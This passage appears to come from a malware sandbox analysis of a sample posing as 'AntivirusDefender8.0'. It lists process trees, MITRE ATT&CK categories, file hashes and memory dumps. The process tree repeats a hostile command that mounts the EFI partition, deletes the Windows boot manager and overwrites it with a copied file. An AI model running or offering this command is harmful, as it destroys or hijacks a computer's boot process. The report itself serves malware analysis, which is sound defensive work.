    PID:2868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /min /c "start cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y""
1⤵
PID:2852
- C:\Windows\system32\cmd.exe
  cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y"
  2⤵
  PID:2296
- - C:\Windows\system32\mountvol.exe
    mountvol x: /s
    3⤵
    PID:2752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /min /c "start cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y""
1⤵
PID:1516
- C:\Windows\system32\cmd.exe
  cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y"
  2⤵
  PID:2052
- - C:\Windows\system32\mountvol.exe
    mountvol x: /s
    3⤵
    PID:2972

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /min /c "start cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y""
1⤵
PID:2120
- C:\Windows\system32\cmd.exe
  cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y"
  2⤵
  PID:488
- - C:\Windows\system32\mountvol.exe
    mountvol x: /s
    3⤵
    PID:600

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\AntivirusDefender8.0-main\AntivirusDefender8.0.lnk

Filesize
1KB

MD5
3da7e181e7e2a7cb91b92cdaf0300c5b

SHA1
8d9691891d52d9ae7acbce140e49653d7225e5cd

SHA256
da6227b4b97a7b3de4abdf570873eedf44192180eb142bfabf91916fefefb41a

SHA512
cca8d154c6764a44914368af05259e35bf60dbc9b09b3842564521ecd99c9023b091113d9adebe7a868f2b96ef3542570bb3b2fca1bff35a15c27b837ad00296

Download Submit
C:\Users\Admin\Desktop\AntivirusDefender8.0-main\RUNTHISFIRST.exe

Filesize
9KB

MD5
1a7514c839000a811e123d97d818c1e9

SHA1
925b53693ef965b68c797eb5c995de539f0e0288

SHA256
cc3657cd6f186055334ccd88f8aac5457265a03b31274517d763fe32003b65ca

SHA512
15c101b2160b8cc9c0f94e6e9e0442598cb16b21b9b69cad48f3f0741e16885d3ddb4b2deafb4739c0ca1db4345f1f45ceae9dad08f21daafc38a8e99f3c4f91

Download Submit
memory/404-22-0x00000000002F0000-0x00000000002F8000-memory.dmp

Filesize
32KB

Download
memory/580-24-0x0000000000920000-0x0000000000928000-memory.dmp

Filesize
32KB

Download
memory/776-26-0x00000000012F0000-0x00000000012F8000-memory.dmp

Filesize
32KB

Download
memory/844-20-0x0000000000020000-0x0000000000028000-memory.dmp

Filesize
32KB

Download
memory/1428-28-0x0000000000140000-0x0000000000148000-memory.dmp

Filesize
32KB

Download
memory/1700-16-0x0000000001390000-0x0000000001398000-memory.dmp

Filesize
32KB

Download
memory/1752-0-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1752-1-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/3008-18-0x0000000000C60000-0x0000000000C68000-memory.dmp

Filesize
32KB

Download